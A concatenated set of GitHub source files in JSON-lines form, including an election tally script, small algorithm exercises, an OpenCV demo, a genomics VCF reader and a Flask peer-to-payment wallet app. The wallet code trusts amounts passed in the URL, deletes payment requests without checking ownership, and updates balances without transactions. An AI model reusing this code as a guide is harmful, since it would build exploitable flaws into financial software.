the candidate list\n    for candidate_name in candidate_votes:\n        # Retrieve vote count of candidate\n        votes = candidate_votes[candidate_name]\n        # Calculate the percentage of votes\n        vote_percentage = float(votes) / float(total_votes) * 100\n        # Print the candidate name and percentage of votes\n        candidate_results = (f\"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\\n\")\n        
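# NOTE (editor's worked example, not in the original): with 3 votes for a\n        # candidate out of 12 total, float(3) / float(12) * 100 == 25.0, so the\n        # line above renders as \"Candidate: 25.0% (3)\".\n        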
print(candidate_results)\n        # Save the candidate results to the text file\n        txt_file.write(candidate_results)\n\n        # Determining winning vote\n        if (votes > winning_count) and (vote_percentage > winning_percentage):\n            # if true set the following\n            winning_count = votes\n            winning_percentage = vote_percentage\n            # winning_candidate equal to candidate's name\n            winning_candidate = candidate_name\n\n    # Winning candidate summary\n    winning_candidate_summary = (\n        f\"-------------------------\\n\"\n        f\"Winner: {winning_candidate}\\n\"\n        f\"Winning Vote Count: {winning_count:,}\\n\"\n        f\"Winning Percentage: {winning_percentage:.1f}%\\n\"\n        f\"---------------------------\\n\")\n    print(winning_candidate_summary)\n\n    # Save the winning candidate results to txt file\n    txt_file.write(winning_candidate_summary)\n\nCYELLOW = '\\33[33m'\nCEND = '\\33[0m'\n\nauthorship_info = (\n    f'****************************************\\n'\n    f'* User current version: {sys_version} *\\n'\n    f'* Author: {__author__} *\\n'\n    f'* Credits: {__credits__} *\\n'\n    f'* Version: {__version__} *\\n'\n    f'* Status: {CYELLOW}{__status__}{CEND} *\\n'\n    f'****************************************\\n' )\nprint(authorship_info)\n","repo_name":"amonjaras/Election_Analysis","sub_path":"PyPoll.py","file_name":"PyPoll.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74531777002","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n\nimport math\n\n\ndef is_prime(n):\n    \"\"\"It utilizes the fact that primes > 4 are 1 (mod 6) or 5 (mod 6):\n    Every prime number is either of the form 6k+1 or 6k+5, or is 2 or 3.\n    Indeed, there are no primes of the form 6k, since 2 is a proper \n    divisor of all such positive integers, the only prime of the \n    form 6k+2 is 2, the only prime of the form 6k+3 is 3, and\n    there are no primes of the form 6k+4, since again 2 is a \n    proper divisor of all such positive integers. 
Since neither 2, 3, nor any pi\n    divides N, this means that N must be a product of only primes\n    of the form 6k+1\"\"\"\n    if n == 2 or n == 3: \n        return True\n    elif n < 2 or n % 2 == 0: \n        return False\n    elif n < 9:\n        return True\n    elif n % 3 == 0: \n        return False\n\n    r = int(math.sqrt(n))\n    f = 5\n    while f <= r:\n        if n % f == 0 or n % (f + 2) == 0: \n            return False\n        else:\n            f += 6\n    return True\n\n\nif __name__ == \"__main__\":\n\n    N = 1000\n    for i in range(N, 1, -1):  # range, not the Python 2 xrange\n        prime_i = str(i)\n        if prime_i == prime_i[::-1] and is_prime(i):\n            print(i)\n            break\n","repo_name":"gabrielPeart/exercises","sub_path":"evaluations/codeeval/easy/prime_palindrome.py","file_name":"prime_palindrome.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1771763475","text":"# Resize\n# Compare how different interpolation (compression) methods change the resized image\n# The interpolation is specified with the third argument of cv2.resize\n# You can confirm that cv2.INTER_AREA gives the more natural-looking image\n\nimport cv2\n\nimg = cv2.imread(\"src/grapes.jpg\")\n\ncv2.imshow(\"img\", img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nprint(img.shape)\n\nsize = (300, 200) # resize target\nimg_resize = cv2.resize(img, size)\n\nprint(img_resize.shape)\n\ncv2.imshow(\"resize\", img_resize)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nimg_area = cv2.resize(img, size, interpolation=cv2.INTER_AREA)\nimg_linear = cv2.resize(img, size, interpolation=cv2.INTER_LINEAR)\ncv2.imshow(\"area\", img_area)\ncv2.imshow(\"linear\", img_linear)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"masachika-kamada/opencv-basic","sub_path":"project04.py","file_name":"project04.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15008963050","text":"class AVLTree:\n    def __init__(self,data):\n        self.data=data\n        self.leftChild=None\n        self.rightChild=None\n        self.height=1\n\nnew_avl_tree=AVLTree(10)\nnew_avl_tree.leftChild=AVLTree(5)\nnew_avl_tree.rightChild=AVLTree(15)\n\ndef postOrderTraversal(rootNode):\n    if not rootNode:\n        return\n    postOrderTraversal(rootNode.leftChild)\n    postOrderTraversal(rootNode.rightChild)\n    print(rootNode.data)\n\npostOrderTraversal(new_avl_tree)","repo_name":"saiharshithpalepu/DSA","sub_path":"AVLTree/postordertraversal.py","file_name":"postordertraversal.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36153135076","text":"import re\nimport sys\n\n# Initialize variables\nsw = 1\nb_count = 0\nb_sw = False\nlast_indent = 0\n\nfor line in sys.stdin:\n    stripped_line = line.strip()\n\n    # Count blank lines but don't write them\n    if stripped_line == '':\n        if sw > 0: \n            sw = 0\n        if sw == -1:\n            sw = -2 # The line following the footer has a FF char which in Python3 is a line break.\n        else:\n            b_count += 1\n    else: # Handle a non-blank line\n        if sw == 0: \n            sw = 1\n        if sw < 0: \n            sw -= 1 # If we're between pages, count footer/dashes/header\n            if sw <= -4: # If we're at the header, resume printing\n                this_indent = len(line) - len(line.lstrip())\n                if b_sw or this_indent < last_indent: \n                    print('') # Print a blank line, if needed\n                sw = 1\n                b_count = 0\n                b_sw = False\n\n        if re.search(r'\\[Page [0-9]+\\] *$', stripped_line): # Found the footer:\n            sw = -1 # Stop output\n            b_sw = b_count > 3 # true = print blank line when resuming output\n        elif sw > 0:\n            # Print a blank line if the previous line(s) was/were blank\n            if b_count: \n                print('')\n                b_count = 0\n            print(line, end='')\n        
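# NOTE (editor's comment, not in the original): last_indent, updated just\n        # below, feeds the header check above -- after a page break, a smaller\n        # indent on the first printed line marks a new paragraph, so the\n        # stripped blank line gets reinserted.\n        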
last_indent = len(line) - len(line.lstrip())\n\n# # Print final line break for consistency with the awk script\n# print()\n","repo_name":"jimwhite/wiki3","sub_path":"indexer/rfc_depage.py","file_name":"rfc_depage.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72894070123","text":"from flask import Blueprint, redirect, request, render_template, url_for, flash\nfrom flask import Blueprint, render_template, flash, redirect, url_for,current_app, session\nfrom auth.forms import LoginForm, RegisterForm , SendMoneyForm, RequestMoneyForm\nfrom sql.db import DB\nimport json\nfrom datetime import datetime, date, timedelta\nfrom collections import defaultdict\n\nfrom flask import jsonify\n#import dateutil.parser\nfrom flask_login import login_user, login_required, logout_user, current_user\nfrom auth.models import User\nfrom sql.db import DB\n\n\nmain_menu = Blueprint('main_menu', __name__, url_prefix='/main_menu')\n\n\n@main_menu.route('/account_info', methods=['GET', 'POST'])\n@login_required\ndef account_info():\n user_email = current_user.get_email()\n result1={}\n try:\n result = DB.selectOne(\"SELECT SSN,NAME,BALANCE FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD =%s \",user_email)\n print(result)\n result2 = DB.selectAll(\"SELECT HA.BANK_ID, HA.BANK_NUMBER FROM USER_ACCOUNT as UA JOIN HAS_ADDITIONAL as HA WHERE UA.SSN=HA.SSN AND UA.SSN=%s\",result.row[\"SSN\"])\n print(result2)\n if result.status:\n flash(\"USER DETAILS FOUND\", \"success\")\n except Exception as e:\n # TODO make this user-friendly\n flash(f\"Error! value not found {e}\", \"danger\")\n return render_template(\"account_info.html\", info=result.row,resp=result2)\n\n@main_menu.route('/send', methods=['GET', 'POST'])\n@login_required\ndef send():\n form = SendMoneyForm()\n if form.validate_on_submit():\n user_email = current_user.get_email()\n send_email = form.email.data\n amount = form.amount.data\n memo = form.memo.data\n print(user_email)\n try:\n result= DB.selectOne(\"SELECT * FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD = %s\" ,send_email)\n if result.status:\n try:\n res_amt = DB.selectOne(\"Select BALANCE,SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \",user_email)\n if(res_amt.row[\"BALANCE\"] > amount):\n update_send= DB.update(\"UPDATE USER_ACCOUNT SET BALANCE = BALANCE + %s WHERE SSN= %s \",amount,result.row[\"SSN\"])\n update_user= DB.update(\"UPDATE USER_ACCOUNT SET BALANCE = BALANCE - %s WHERE SSN= %s \",amount,res_amt.row[\"SSN\"])\n flash(\"Transaction Made\",\"success\")\n try:\n res=DB.insertOne(\"INSERT INTO SEND_TRANSACTION(AMOUNT, MEMO, IDENTIFIER, SSN) values (%s,%s,%s,%s)\",amount,memo,send_email,res_amt.row[\"SSN\"])\n except Exception as e:\n flash(f\"{e}\",\"danger\")\n else:\n flash(\"Insufficient Amount\",\"danger\")\n except Exception as e:\n flash(\"User doesn't exist.\",\"danger\")\n \n except Exception as e:\n flash(\"User doesn't exist.\",\"danger\")\n\n return render_template(\"send_money.html\",form=form)\n\n@main_menu.route('/request_money', methods=['GET', 'POST'])\n@login_required\ndef request_money():\n user_id = current_user.get_id()\n\n form = RequestMoneyForm()\n if form.validate_on_submit():\n user_email = current_user.get_email()\n request_email = form.email.data\n amount = form.amount.data\n memo = form.memo.data\n\n print(user_email)\n try:\n result= DB.selectOne(\"SELECT * FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD = %s\" 
,request_email)\n            if result.row is not None:\n                if result.status:\n                    try:\n                        res_amt = DB.selectOne(\"Select SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \",user_email)\n                        res=DB.insertOne(\"INSERT INTO REQUEST_TRANSACTION(AMOUNT, MEMO, SSN) values (%s,%s,%s)\",amount,memo,res_amt.row[\"SSN\"])\n                        res_rtid=DB.selectOne(\"Select RT_ID FROM REQUEST_TRANSACTION ORDER BY RT_ID DESC LIMIT 1\")\n                        res1=DB.insertOne(\"INSERT INTO FROM_TRANSACTION (RT_ID, IDENTIFIER) values (%s,%s)\",res_rtid.row[\"RT_ID\"],request_email)\n                        if res.status:\n                            flash(\"Success! Request saved to the database\",\"success\")\n                    except Exception as e:\n                        flash(f\"{e}\",\"danger\")\n            else:\n                flash(\"User doesn't exist.\",\"danger\")\n        except Exception as e:\n            flash(\"User doesn't exist.\",\"danger\")\n\n    return render_template(\"request_money.html\",form=form)\n\n@main_menu.route('/pending_requests', methods=['GET', 'POST'])\n@login_required\ndef pending_requests():\n    user_id = current_user.get_id()\n    user_email= current_user.get_email()\n    print(\"---------------------------------------------\")\n    #flash(f\"ID IS {user_id}\",\"success\")\n    result= DB.selectAll(\"SELECT R.RT_ID,AMOUNT,MEMO, DATE_TIME FROM REQUEST_TRANSACTION R, FROM_TRANSACTION F WHERE R.RT_ID=F.RT_ID AND IDENTIFIER=%s ORDER BY DATE_TIME ASC\",user_email)\n    if result.status:\n        flash(\"Working\", \"success\")\n    return render_template(\"pending_requests.html\",resp=result)\n\n\n@main_menu.route('/payment/<float:amount>/<int:rt_id>/<memo>')\n@login_required\ndef payment(amount,rt_id,memo):\n    user_email = current_user.get_email()\n    user_balance = DB.selectOne(\"Select BALANCE,SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \",user_email)\n    print(user_balance.row[\"BALANCE\"])\n    receiver_SSN = DB.selectOne(\"Select BALANCE,SSN FROM REQUEST_TRANSACTION NATURAL JOIN USER_ACCOUNT WHERE RT_ID=%s \",rt_id)\n    print(user_email)\n    print(amount)\n    try:\n        result= DB.selectOne(\"SELECT * FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE SSN = %s\" ,receiver_SSN.row[\"SSN\"])\n        \n        try:\n            print(\"INSIDE TRY\",user_balance.row[\"BALANCE\"])\n\n            if(user_balance.row[\"BALANCE\"] > amount):\n                update_send= DB.update(\"UPDATE USER_ACCOUNT SET BALANCE = BALANCE + %s WHERE SSN= %s \",amount,result.row[\"SSN\"])\n                update_user= DB.update(\"UPDATE USER_ACCOUNT SET BALANCE = BALANCE - %s WHERE SSN= %s \",amount,user_balance.row[\"SSN\"])\n                delete_request= DB.delete(\"DELETE FROM REQUEST_TRANSACTION WHERE RT_ID=%s\",rt_id)\n                res=DB.insertOne(\"INSERT INTO SEND_TRANSACTION(AMOUNT, MEMO, IDENTIFIER, SSN) values (%s,%s,%s,%s)\",amount,memo,result.row[\"EMAIL_ADD\"],user_balance.row[\"SSN\"])\n                flash(\"Transaction Made\",\"success\")\n            else:\n                flash(\"Insufficient Amount\",\"danger\")\n        except Exception as e:\n            flash(\"Transaction failed.\",\"danger\")\n    except Exception as e:\n        flash(\"User doesn't exist.\",\"danger\")\n    return pending_requests()\n\n\n#def DecodeDateTime(result):\n    #if 'DATE_TIME' in result:\n#        result[\"DATE_TIME\"] = dateutil.parser.parse(result[\"DATE_TIME\"])\n#    return result\n\n\"\"\" @main_menu.route('/statements', methods=['GET', 'POST'])\n@login_required\ndef statements():\n    user_email = current_user.get_email()\n    user_ssn = DB.selectOne(\"Select SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \",user_email)\n    user_id = current_user.get_id()\n    print(\"---------------------------------------------\")\n    #flash(f\"ID IS {user_id}\",\"success\")\n    result= DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s 
ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n if result.status:\n flash(\"Working\", \"success\")\n return render_template(\"statements.html\",resp=result) \"\"\"\n\n@main_menu.route('/monthly_statements', methods=['GET', 'POST'])\n@login_required\ndef monthly_statements():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \", user_email)\n user_id = current_user.get_id()\n print(\"---------------------------------------------\")\n #flash(f\"ID IS {user_id}\",\"success\")\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n if result.status:\n flash(\"Working\", \"success\")\n\n # group transactions by month\n transactions_by_month = {}\n total_sent_by_month = {}\n total_received_by_month = {}\n\n for transaction in result.rows:\n month = transaction[\"DATE_TIME\"].strftime(\"%B\")\n if month not in transactions_by_month:\n transactions_by_month[month] = []\n total_sent_by_month[month] = 0\n total_received_by_month[month] = 0\n transactions_by_month[month].append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent_by_month[month] += transaction[\"AMOUNT\"]\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received_by_month[month] += transaction[\"AMOUNT\"]\n\n return render_template(\"monthly_statements.html\",\n transactions_by_month=transactions_by_month,\n total_sent_by_month=total_sent_by_month,\n total_received_by_month=total_received_by_month)\n\n\n\n@main_menu.route('/search_transactions', methods=['GET', 'POST'])\n@login_required\ndef search_transactions():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s\", user_email)\n user_id = current_user.get_id()\n\n # Handle search\n search_query = request.args.get('search_query')\n if search_query:\n sql_statement = \"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME FROM SEND_TRANSACTION WHERE (IDENTIFIER=%s OR SSN=%s) AND (IDENTIFIER=%s OR STID=%s OR AMOUNT=%s OR MEMO=%s) ORDER BY DATE_TIME DESC\"\n result = DB.selectAll(sql_statement, user_email, user_ssn.row[\"SSN\"], search_query, search_query, search_query, search_query)\n else:\n sql_statement = \"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\"\n result = DB.selectAll(sql_statement, user_email, user_ssn.row[\"SSN\"])\n\n\n if result.status:\n flash(\"Working\", \"success\")\n\n return render_template(\"search_transaction.html\", resp=result.rows)\n\n\n@main_menu.route('/totalamount', methods=['GET', 'POST'])\n@login_required\ndef totalamount():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \", user_email)\n user_id = current_user.get_id()\n\n start_date = None\n end_date = None\n if request.method == 'POST':\n start_date_str = request.form.get('start_date')\n end_date_str = request.form.get('end_date')\n start_date = datetime.strptime(start_date_str, '%Y-%m-%d')\n end_date = datetime.strptime(end_date_str, '%Y-%m-%d')\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE (IDENTIFIER=%s OR SSN=%s) AND DATE_TIME >= %s AND DATE_TIME <= %s ORDER BY 
DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"], start_date, end_date)\n else:\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n \n if result.status:\n flash(\"Working\", \"success\")\n\n transactions = []\n total_sent = 0\n total_received = 0\n\n for transaction in result.rows:\n if start_date and end_date:\n if start_date <= transaction[\"DATE_TIME\"] <= end_date:\n transactions.append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent += transaction[\"AMOUNT\"]\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received += transaction[\"AMOUNT\"]\n else:\n transactions.append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent += transaction[\"AMOUNT\"]\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received += transaction[\"AMOUNT\"]\n\n return render_template(\"totalamount.html\",\n transactions=transactions,\n total_sent=total_sent,\n total_received=total_received)\n\n\n@main_menu.route('/avgmoney', methods=['GET', 'POST'])\n@login_required\ndef avgmoney():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \", user_email)\n user_id = current_user.get_id()\n print(\"---------------------------------------------\")\n #flash(f\"ID IS {user_id}\",\"success\")\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n if result.status:\n flash(\"Working\", \"success\")\n\n # group transactions by month\n transactions_by_month = {}\n total_sent_by_month = {}\n total_received_by_month = {}\n\n for transaction in result.rows:\n month = transaction[\"DATE_TIME\"].strftime(\"%B\")\n if month not in transactions_by_month:\n transactions_by_month[month] = []\n total_sent_by_month[month] = 0\n total_received_by_month[month] = 0\n transactions_by_month[month].append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent_by_month[month] += transaction[\"AMOUNT\"]\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received_by_month[month] += transaction[\"AMOUNT\"]\n \n # calculate average money sent and received per month\n num_months = len(transactions_by_month)\n avg_sent_by_month = {month: total_sent_by_month[month]/num_months for month in total_sent_by_month}\n avg_received_by_month = {month: total_received_by_month[month]/num_months for month in total_received_by_month}\n\n return render_template(\"avgmoney.html\",\n transactions_by_month=transactions_by_month,\n avg_sent_by_month=avg_sent_by_month,\n avg_received_by_month=avg_received_by_month)\n\n\n@main_menu.route('/maxmoney', methods=['GET', 'POST'])\n@login_required\ndef maxmoney():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \", user_email)\n user_id = current_user.get_id()\n print(\"---------------------------------------------\")\n grant_perm=(\"GRANT EXECUTE ON FUNCTION DATE_TRUNC TO 'jc2494'@'%';\")\n test_query=DB.selectAll(\"\"\"SELECT DATE_FORMAT(DATE_TIME, '%Y-%m') AS month,\n MAX(CASE WHEN SSN = %s THEN AMOUNT ELSE 0 END) AS max_sent,\n MAX(CASE WHEN IDENTIFIER = %s THEN AMOUNT ELSE 0 END) AS max_received\nFROM SEND_TRANSACTION\nWHERE IDENTIFIER 
= %s OR SSN = %s\nGROUP BY month\"\"\",user_ssn.row[\"SSN\"],user_email,user_ssn.row[\"SSN\"],user_email)\n print(\"printing test query result: \",test_query)\n #flash(f\"ID IS {user_id}\",\"success\")\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n if result.status:\n flash(\"Working\", \"success\")\n\n # group transactions by month\n transactions_by_month = {}\n total_sent_by_month = {}\n total_received_by_month = {}\n\n for transaction in result.rows:\n month = transaction[\"DATE_TIME\"].strftime(\"%B %Y\")\n if month not in transactions_by_month:\n transactions_by_month[month] = []\n total_sent_by_month[month] = []\n total_received_by_month[month] = []\n transactions_by_month[month].append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent_by_month[month].append(transaction[\"AMOUNT\"])\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received_by_month[month].append(transaction[\"AMOUNT\"])\n\n # find transactions with maximum amount sent and received per month\n max_sent_by_month = {month: max(total_sent_by_month[month]) if total_sent_by_month[month] else 0 for month in total_sent_by_month}\n max_received_by_month = {month: max(total_received_by_month[month]) if total_received_by_month[month] else 0 for month in total_received_by_month}\n max_sent_transactions = []\n max_received_transactions = []\n\n for month in transactions_by_month:\n for transaction in transactions_by_month[month]:\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"] and transaction[\"AMOUNT\"] == max_sent_by_month[month]:\n max_sent_transactions.append(transaction)\n elif transaction[\"IDENTIFIER\"] == user_email and transaction[\"AMOUNT\"] == max_received_by_month[month]:\n max_received_transactions.append(transaction)\n\n return render_template(\"maxmoney.html\",transactions_by_month=transactions_by_month,\n max_sent_transactions=max_sent_transactions,\n max_received_transactions=max_received_transactions, user_ssn=user_ssn,max_sent_by_month=max_sent_by_month)\n\n\n","repo_name":"mricha828/Wallet-Payment-Network","sub_path":"DMSDProject-main/views/main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":17515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"41389688042","text":"\"\"\"Main Class for Scan Statistics\"\"\"\n\nimport logging\nimport pandas as pd\n\nfrom SpatialScan.preprocessing import data_preprocessor\nfrom SpatialScan.timeseries import count_baseline\nfrom SpatialScan.scan import scan\nfrom SpatialScan.results import database_results, visualise_results_from_database\nfrom SpatialScan.region import make_region_from_res, plot_region_time_series, plot_region_by_rank\n\n\nclass ScanStatistic:\n \"\"\"Simple helper class to reduce number of function calls when modelling\"\"\"\n\n def __init__(\n self,\n readings,\n grid_resolution=8,\n percentage_missing=20,\n max_anom_per_day=1,\n N_sigma=3,\n repeats=1,\n rolling_hours=24,\n fap_threshold=1e-40,\n consecutive_missing_threshold=3,\n global_threshold=False,\n drop_sparse=True,\n drop_anomalous=True,\n drop_aperiodic=True,\n drop_consecutives=True,\n data_type=\"scoot\",\n days_in_past=28,\n days_in_future=1,\n ts_method=\"HW\",\n alpha=0.03869791,\n beta=0.0128993,\n gamma=0.29348953,\n kernel=None,\n ):\n self.readings = readings\n self.grid_resolution = grid_resolution\n 
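# NOTE (editor's comment, not in the original): alpha/beta/gamma in the\n        # signature above are presumably Holt-Winters smoothing coefficients\n        # (level, trend, seasonality); run() passes them straight through to\n        # count_baseline() when ts_method=\"HW\".\n        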
self.percentage_missing = percentage_missing\n self.max_anom_per_day = max_anom_per_day\n self.N_sigma = N_sigma\n self.repeats = repeats\n self.rolling_hours = rolling_hours\n self.fap_threshold = fap_threshold\n self.consecutive_missing_threshold = consecutive_missing_threshold\n self.global_threshold = global_threshold\n self.drop_sparse = drop_sparse\n self.drop_anomalous = drop_anomalous\n self.drop_aperiodic = drop_aperiodic\n self.drop_consecutives = drop_consecutives\n self.data_type = data_type\n self.days_in_past = days_in_past\n self.days_in_future = days_in_future\n self.ts_method = ts_method\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n self.kernel = kernel\n\n # results at each stage of pipeline\n self.processed = None\n self.forecast = None\n self.all_results = None\n self.grid_results = None\n\n def run(self):\n \"\"\"Build scan results\"\"\"\n self.processed = data_preprocessor(\n self.readings,\n self.percentage_missing,\n self.max_anom_per_day,\n self.N_sigma,\n self.repeats,\n self.rolling_hours,\n self.fap_threshold,\n self.consecutive_missing_threshold,\n self.global_threshold,\n self.drop_sparse,\n self.drop_anomalous,\n self.drop_aperiodic,\n self.drop_consecutives,\n )\n self.forecast = count_baseline(\n self.processed,\n self.days_in_past,\n self.days_in_future,\n self.ts_method,\n alpha=self.alpha,\n beta=self.beta,\n gamma=self.gamma,\n kern=self.kernel,\n )\n self.all_results = scan(self.forecast, self.grid_resolution)\n self.grid_results = database_results(self.all_results)\n\n def plot(self, metric=\"av_lhd_score_EBP\"):\n \"\"\"Plot animation plot from results\"\"\"\n if isinstance(self.grid_results, pd.DataFrame):\n visualise_results_from_database(self.grid_results, metric=metric)\n else:\n logging.info(\" Results not populated. Call `run()` first.\")\n\n def highest_region(self):\n \"\"\"Return highest region\"\"\"\n if isinstance(self.all_results, pd.DataFrame):\n return self.all_results.iloc[0]\n logging.info(\"Results not populated. 
Call `run()` first.\")\n\n    def plot_region_time_series(self, rank=0, legend=False):\n        if not isinstance(self.all_results, pd.DataFrame):\n            raise TypeError('Run the scan first')\n        region = make_region_from_res(self.all_results, rank=rank)\n        plot_region_time_series(region, self.forecast, add_legend=legend)\n    \n    def plot_region_by_rank(self, rank=0, legend=False):\n        if not isinstance(self.all_results, pd.DataFrame):\n            raise TypeError('Run the scan first')\n        plot_region_by_rank(rank, self.all_results, self.forecast, add_legend=legend)\n\n    def model_settings(self):\n        settings = self.__dict__.copy()\n        del settings['readings']\n        del settings['processed']\n        del settings['forecast']\n        del settings['all_results']\n        del settings['grid_results']\n        print(settings)\n","repo_name":"TeddyTW/SpatialScan","sub_path":"SpatialScan/scanstatistic.py","file_name":"scanstatistic.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"35654667321","text":"import sys\nfrom cyvcf2 import VCF\n\nif len(sys.argv) != 2:\n\tprint(f\"Usage: {sys.argv[0]} <vcf_file>\")\n\tsys.exit(1)\n\nvcf_file = sys.argv[1]\nfor variant in VCF(vcf_file):\n\tif variant.FILTER is None: # when FILTER == \"PASS\", cyvcf2 puts None on the FILTER variable\n\t\tboth_genotypes = variant.genotypes[0][:2]\n\t\tgt_1 = both_genotypes[0]\n\t\tgt_2 = both_genotypes[1]\n\t\tif gt_1 != -1 and gt_2 != -1:\n\t\t\tprint(str(gt_1) if gt_1==gt_2 else f\"{gt_1}/{gt_2}\")\n","repo_name":"leoisl/random","sub_path":"gt_reader/test_read_vcf_cyvcf2.py","file_name":"test_read_vcf_cyvcf2.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40948331773","text":"import logging\n\nfrom .cortex_m import CortexM\nfrom .core_ids import (CORE_TYPE_NAME, CoreArchitecture, CortexMExtension)\nfrom ..core.target import Target\nfrom .cortex_m_core_registers import CoreRegisterGroups\n\nLOG = logging.getLogger(__name__)\n\nclass CortexM_v8M(CortexM):\n    \"\"\"@brief Component class for a v8.x-M architecture Cortex-M core.\"\"\"\n\n    ARMv8M_BASE = 0xC\n    ARMv8M_MAIN = 0xF\n\n    ## DFSR.PMU added in v8.1-M.\n    DFSR_PMU = (1 << 5)\n\n    DSCSR = 0xE000EE08\n    DSCSR_CDSKEY = 0x00020000\n    DSCSR_CDS = 0x00010000\n    DSCSR_SBRSEL = 0x00000002\n    DSCSR_SBRSELEN = 0x00000001\n\n    # Processor Feature Register 0\n    PFR0 = 0xE000ED40\n    PFR0_RAS_MASK = 0xf0000000\n    PFR0_RAS_SHIFT = 28\n    PFR0_RAS_VERSION_1 = 2\n\n    # Processor Feature Register 1\n    PFR1 = 0xE000ED44\n    PFR1_SECURITY_MASK = 0x000000f0\n    PFR1_SECURITY_SHIFT = 4\n\n    PFR1_SECURITY_EXT_V8_0 = 0x1 # Base security extension.\n    PFR1_SECURITY_EXT_V8_1 = 0x3 # v8.1-M adds several instructions.\n\n    # Debug Feature Register 0\n    DFR0 = 0xE000ED48\n    DFR0_UDE_MASK = 0xf0000000\n    DFR0_UDE_SHIFT = 28\n    DFR0_UDE_SUPPORTED = 1\n\n    # Media and FP Feature Register 1\n    MVFR1 = 0xE000EF44\n    MVFR1_MVE_MASK = 0x00000f00\n 